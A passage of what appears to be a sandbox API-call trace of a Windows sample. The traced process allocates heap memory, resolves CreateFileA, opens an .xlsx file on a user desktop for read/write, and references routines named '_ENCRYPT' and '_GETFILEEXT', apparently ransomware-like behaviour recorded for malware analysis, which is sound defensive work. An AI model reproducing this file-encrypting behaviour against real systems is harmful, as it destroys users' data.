(HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5c40 [0031.798] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0031.798] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0031.798] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0031.798] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0031.798] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0031.798] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0031.798] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0031.798] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0031.798] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0031.798] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0031.798] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce68 [0031.798] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0031.798] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0031.798] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce68 | out: hHeap=0x770000) returned 1 [0031.798] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0031.798] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0c70 [0031.798] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0031.798] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce68 [0031.798] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0031.798] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0031.798] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0031.798] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce68 | out: hHeap=0x770000) returned 1 [0031.798] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0031.798] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0031.798] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0031.798] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0031.798] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0031.799] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0031.799] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0031.799] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce68 [0031.799] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0031.799] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0031.799] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce68 | out: hHeap=0x770000) returned 1 [0031.799] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0031.799] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0031.799] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce68 [0031.799] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0031.799] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0031.799] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0031.799] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce68 | out: hHeap=0x770000) returned 1 [0031.799] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0031.799] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0031.799] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0031.799] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0031.799] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0031.799] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0031.799] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0031.799] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce68 [0031.799] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0031.799] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0031.799] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce68 | out: hHeap=0x770000) returned 1 [0031.799] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0031.799] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0031.800] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce68 [0031.800] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0031.800] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0031.800] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0031.800] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce68 | out: hHeap=0x770000) returned 1 [0031.800] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0031.800] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0031.800] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0031.800] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0031.800] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0031.800] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0031.800] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0031.800] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce68 [0031.800] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0031.800] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0031.800] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce68 | out: hHeap=0x770000) returned 1 [0031.800] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0031.800] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0031.800] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce68 [0031.800] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0031.800] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0031.800] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0031.800] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce68 | out: hHeap=0x770000) returned 1 [0031.800] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0031.800] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0031.800] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0031.800] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0031.800] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0031.800] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0031.800] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0031.801] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xb) returned 0x88ce68 [0031.801] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x88ce68, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0031.801] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce68 | out: hHeap=0x770000) returned 1 [0031.801] GetProcAddress (hModule=0x76e10000, lpProcName="CreateFile") returned 0x0 [0031.801] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0031.801] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0031.801] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0031.801] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13c8 [0031.801] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0031.801] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0031.801] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0031.801] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88ce68 [0031.801] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x88ce68, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileA", lpUsedDefaultChar=0x0) returned 12 [0031.801] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce68 | out: hHeap=0x770000) returned 1 [0031.801] GetProcAddress (hModule=0x76e10000, lpProcName="CreateFileA") returned 0x76e253c6 [0031.801] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0031.801] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0031.801] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0031.801] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0031.801] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13c8 [0031.801] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0031.801] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0031.801] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0031.801] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0031.801] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0031.801] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0031.801] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0031.801] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10001) returned 0x935008 [0031.801] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\T 5FxqsHMby.xlsx", cchWideChar=79, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 79 [0031.802] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4f) returned 0x7f3630 [0031.802] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\T 5FxqsHMby.xlsx", cchWideChar=79, lpMultiByteStr=0x7f3630, cbMultiByte=79, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\T 5FxqsHMby.xlsx", lpUsedDefaultChar=0x0) returned 79 [0031.802] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7f3630 | out: hHeap=0x770000) returned 1 [0031.802] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0031.802] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0031.802] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0031.802] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0031.802] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0031.802] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0031.802] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0031.802] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0031.802] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\T 5FxqsHMby.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tpm9533uyxhl8c6vtf\\tjni\\t 5fxqshmby.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0031.802] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0031.802] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b8158 [0031.802] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13c8 [0031.802] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0031.802] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce68 [0031.802] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0031.802] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0031.802] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0031.802] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0031.802] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce68 | out: hHeap=0x770000) returned 1 [0031.802] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce68 [0031.802] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0031.802] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc40 [0031.802] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0031.802] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0x935008, cbMultiByte=79, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 79 [0031.802] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x9e) returned 0x7d8600 [0031.802] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0x935008, cbMultiByte=79, lpWideCharStr=0x7d8600, cchWideChar=79 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\T 5FxqsHMby.xlsx") returned 79 [0031.802] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc40 | out: hHeap=0x770000) returned 1 [0031.803] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xa0) returned 0x7d8558 [0031.803] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d8600 | out: hHeap=0x770000) returned 1 [0031.803] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x935008 | out: hHeap=0x770000) returned 1 [0031.803] FreeLibrary (hLibModule=0x76e10000) returned 1 [0031.803] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0031.803] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0031.803] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0031.803] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0031.803] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0031.803] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0031.803] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0031.803] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0031.803] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0031.803] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0031.803] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0031.803] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a90 | out: hHeap=0x770000) returned 1 [0031.803] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca00 | out: hHeap=0x770000) returned 1 [0031.803] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0031.803] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c898 | out: hHeap=0x770000) returned 1 [0031.803] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0031.803] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889aa8 | out: hHeap=0x770000) returned 1 [0031.803] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88caf0 | out: hHeap=0x770000) returned 1 [0031.803] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: hHeap=0x770000) returned 1 [0031.803] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899a0 | out: hHeap=0x770000) returned 1 [0031.803] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c910 | out: hHeap=0x770000) returned 1 [0031.803] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8b0 | out: hHeap=0x770000) returned 1 [0031.803] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ac0 | out: hHeap=0x770000) returned 1 [0031.803] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb20 | out: hHeap=0x770000) returned 1 [0031.803] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc10 | out: hHeap=0x770000) returned 1 [0031.803] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce38 | out: hHeap=0x770000) returned 1 [0031.803] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c730 | out: hHeap=0x770000) returned 1 [0031.803] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dd8 | out: hHeap=0x770000) returned 1 [0031.803] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ad8 | out: hHeap=0x770000) returned 1 [0031.803] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0031.804] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0031.804] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0031.804] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccb8 | out: hHeap=0x770000) returned 1 [0031.804] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce98 | out: hHeap=0x770000) returned 1 [0031.804] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891f0 | out: hHeap=0x770000) returned 1 [0031.804] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0031.804] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0031.804] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0031.804] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5c40 | out: hHeap=0x770000) returned 1 [0031.804] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0031.804] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0031.804] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0031.804] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0031.804] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0031.804] FreeLibrary (hLibModule=0x76e10000) returned 1 [0031.804] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0031.804] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0031.804] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c730 | out: hHeap=0x770000) returned 1 [0031.804] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0031.804] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891f0 | out: hHeap=0x770000) returned 1 [0031.804] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0031.804] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccb8 | out: hHeap=0x770000) returned 1 [0031.804] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce98 | out: hHeap=0x770000) returned 1 [0031.804] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0031.804] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0031.804] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ad8 | out: hHeap=0x770000) returned 1 [0031.804] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0031.804] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dd8 | out: hHeap=0x770000) returned 1 [0031.804] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13f0 | out: hHeap=0x770000) returned 1 [0031.804] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce38 | out: hHeap=0x770000) returned 1 [0031.804] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc10 | out: hHeap=0x770000) returned 1 [0031.804] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0031.805] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b85a8 | out: hHeap=0x770000) returned 1 [0031.805] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0031.805] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0031.805] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0031.805] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc10 | out: hHeap=0x770000) returned 1 [0031.805] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889928 | out: hHeap=0x770000) returned 1 [0031.805] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0031.805] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0031.805] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af438 | out: hHeap=0x770000) returned 1 [0031.805] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0031.805] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0031.805] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1508 | out: hHeap=0x770000) returned 1 [0031.805] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af438 | out: hHeap=0x770000) returned 1 [0031.805] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0031.805] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0031.805] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0031.805] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0031.805] PeekMessageW (in: lpMsg=0x6aea94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea94) returned 0 [0031.805] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="x", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0031.805] CompareStringW (Locale=0x400, 